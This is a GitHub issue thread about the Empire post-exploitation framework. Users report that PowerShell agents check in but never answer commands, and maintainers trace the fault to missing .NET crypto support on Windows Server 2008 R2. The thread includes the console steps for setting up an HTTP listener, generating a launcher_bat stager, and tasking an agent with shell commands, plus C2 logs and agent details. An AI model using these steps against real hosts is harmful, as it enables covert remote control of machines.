### ISSUE TITLE
agents not responding at all

### ISSUE THREAD

**Issue by CaledoniaProject** [adaptivethreat/Empire#325] opened 2016-09-20 16:17 UTC
## Empire Version
Latest, master branch

## OS Information (Linux flavor, Python version)

```
Ubuntu 16.04
Python 2.7.12
```

Agent runs in 2K8 R2, no patch.

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

./empire --debug, 

then run

```
> listeners
> set Host http://172.16.177.200:8080
> run
> list
(Empire: listeners) > list

[*] Active listeners:

  ID    Name              Host                                 Type      Delay/Jitter   KillDate    Redirect Target
  --    ----              ----                                 -------   ------------   --------    ---------------
  1     test1             http://172.16.177.200:8080           native    5/0.0

> usestager launcher_bat
> set OutFile /share/tmp/ps.cmd
> generate
```

Now execute ps.cmd in the UNC path (Windows 2008 R2)

```
(Empire: agents) > [+] Initial agent LK4HB11SWPVWLCCT from 172.16.177.130 now active

(Empire: agents) > interact LK4HB11SWPVWLCCT
(Empire: LK4HB11SWPVWLCCT) > shell ipconfig
(Empire: LK4HB11SWPVWLCCT) > shell whoami
(Empire: LK4HB11SWPVWLCCT) >
```

Yeah, completely no response?

## empire.log

Looks useless to me ..

```
2016-09-21 00:06:47 HttpHandler : [*] /admin/get.php requested from LK4HB11SWPVWLCCT at 172.16.177.130
2016-09-21 00:06:52 HttpHandler : [*] /admin/get.php requested from LK4HB11SWPVWLCCT at 172.16.177.130
2016-09-21 00:06:57 HttpHandler : [*] /login/process.jsp requested from LK4HB11SWPVWLCCT at 172.16.177.130
2016-09-21 00:07:02 HttpHandler : [*] /admin/get.php requested from LK4HB11SWPVWLCCT at 172.16.177.130
```

The `downloads/LK4HB11SWPVWLCCT/agent.log`, useless too

```
2016-09-21 00:12:44 :
[+] Agent LK4HB11SWPVWLCCT now active:
  ps_version      	2
  old_uris        	None
  jitter          	0.0
  servers         	None
  internal_ip     	172.16.177.130
  working_hours
  session_key     	Lu2{[0Ei-|%F+vram7AGcM#*W\nX=$k^
  children        	None
  checkin_time    	2016-09-21 00:12:44
  hostname        	WIN-ENBFDGCFJTC
  delay           	5
  uris            	/admin/get.php,/news.asp,/login/process.jsp
  username        	CORP\Administrator
  kill_date
  parent          	None
  process_name    	powershell
  listener        	http://172.16.177.200:8080/
  sessionID       	LK4HB11SWPVWLCCT
  process_id      	892
  os_details      	Microsoft Windows Server 2008 R2 Enterprise
  lost_limit      	60
  ID              	1
  name            	LK4HB11SWPVWLCCT
  external_ip     	172.16.177.130
  headers
  user_agent      	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  lastseen_time   	2016-09-21 00:12:44
  high_integrity  	1



2016-09-21 00:12:50 :
Tasked agent to run shell command ipconfig

2016-09-21 00:12:52 :
Tasked agent to run shell command whoami
```

What else can I provide you?

**Comment by bneg** [comment] 2016-09-22 13:58
@HarmJ0y has asked me in the past for a pcap dump. I'm sure that'd be helpful as well.

**Comment by fyoder** [comment] 2016-09-22 20:37
I am having exactly this same problem.  I am running on a fully upgraded Kali 2 box, same results against 2 different windows 7 machines.  I have tried re-installing empire, still no luck.

**Comment by atkinsj** [comment] 2016-10-02 00:42
I've experienced this as well recently on a Server 2012 R2 host. The stager completed, the agent was successfully dropped and called back once populating the agent info and then would not respond to any commands. Upon further investigation, the PowerShell process on the host had terminated which explains why I couldn't communicate with the agent.

Unfortunately since it just terminates I have no further way of investigating: any suggestions? It would be nice if we could implement a feature that wraps the agent spawn in something that catches exceptions/stderr and POST's it back to the listener so we have a way of troubleshooting things like this.

**Comment by rvrsh3ll** [comment] 2016-10-02 13:11
Can you reproduce this in 2.0_beta ?

**Comment by atkinsj** [comment] 2016-10-02 13:16
Yup -- fresh Server 2012 R2 install with 2.0_beta had this issue.

**Comment by rvrsh3ll** [comment] 2016-10-02 13:47
Ok thanks for the additional info. We'll see what we can do!

**Comment by leesoh** [comment] 2016-10-02 14:14
I have the same issue with 2.0_beta on both Debian 8 and elementaryOS 0.4, although I don't have the PowerShell.exe process crash.

**Comment by leesoh** [comment] 2016-10-02 14:29
Here's the --debug 2 output of my agent negotiation:
```
(Empire: listeners) >  listeners/http : [*] GET request for 192.168.27.128/admin/get.php from 192.168.27.1
 Agents : [*] handle_agent_data(): sessionID 00000000 issued a STAGE0 request
 listeners/http : [*] Sending POWERSHELL stager (stage 1) to 192.168.27.1
 Agents : [*] handle_agent_data(): sessionID MZ6D9SP1 issued a STAGE1 request
 Agents : [*] Agent MZ6D9SP1 from 192.168.27.1 posted public key
 Agents : [*] Agent MZ6D9SP1 from 192.168.27.1 posted valid PowerShell RSA key
 Agents : [*] handle_agent_data(): sessionID MZ6D9SP1 issued a STAGE2 request
 Agents : [!] Nonce verified: agent MZ6D9SP1 posted valid sysinfo checkin format: 8239641989788523|https://192.168.27.128:443|W10BOX|user01|W10BOX|192.168.<snip> fe80::<snip> 192.168.<snip> fe80::<snip> 192.168.<snip> fe80::<snip>|Microsoft Windows 10 Pro|False|powershell|5572|powershell|5
 Agents : [+] Initial agent MZ6D9SP1 from 192.168.27.1 now active
[+] Initial agent MZ6D9SP1 from 192.168.27.1 now active
 listeners/http : [*] Sending agent (stage 2) to MZ6D9SP1 at 192.168.27.1
```

**Comment by rvrsh3ll** [comment] 2016-10-02 18:58
AesCryptoServiceProvider class is not enabled by default in server 2008 r2
default, the system comes with .Net Framework Setup v2.0.50727
This may be something we can't fix due to the crypto requirement. I'll talk to @harmj0y about it more but, I'm pretty sure that's the issue. You can install .NET

**Comment by atkinsj** [comment] 2016-10-03 01:32
That's a downer, I hope that's not the outcome as support on Server 2008 R2 vanilla without messing with the host environment is a huge benefit. I'm always hesitant to mess with .NET on say IIS servers due to the surprising and disastrous impact it can have on ASP.NET applications. I suppose we could just use Cobalt Strike or Meterpreter on those hosts anyway.

**Comment by rvrsh3ll** [comment] 2016-10-03 13:37
We understand your pain. Unfortunately, we don't see a work-around for this issue. Proper crypto is one of our main features of Empire and at this time and we can't sacrifice that. We'll certainly keep this in mind if we come across a viable solution. Closing for now. Appreciate the heads-up.

**Closed by rvrsh3ll** 2016-10-03 13:37 UTC

**Comment by atkinsj** [comment] 2016-10-04 06:50
@rvrsh3ll Is this the same issue for Server 2012 R2 which was also discussed in this thread? Stager calls back, implant runs, immediately exits. Reproducible on a fresh 2012 install.

If not let me know and I'll open a new issue with reproducibility steps etc.

**Comment by leesoh** [comment] 2016-10-04 14:25
@atkinsj It looks like this might have been a red herring supplied by yours truly. Have you launched Empire with the --debug 2 flag? (`./empire --debug 2)? If so, can you post your agent negotiation?

**Comment by atkinsj** [comment] 2016-10-07 08:59
@leesoh I had this during an engagement where the stager would run, an agent successfully deploy and then terminate immediately but I'm having trouble reproducing it in the lab. If I find some reproducibility steps I'll raise a new issue. Thanks!

**Comment by leesoh** [comment] 2016-10-07 11:44
@atkinsj That makes me feel a little better! I'll do the same but haven't had luck so far.

**Comment by thansau239** [comment] 2016-10-28 08:16
The same my issue
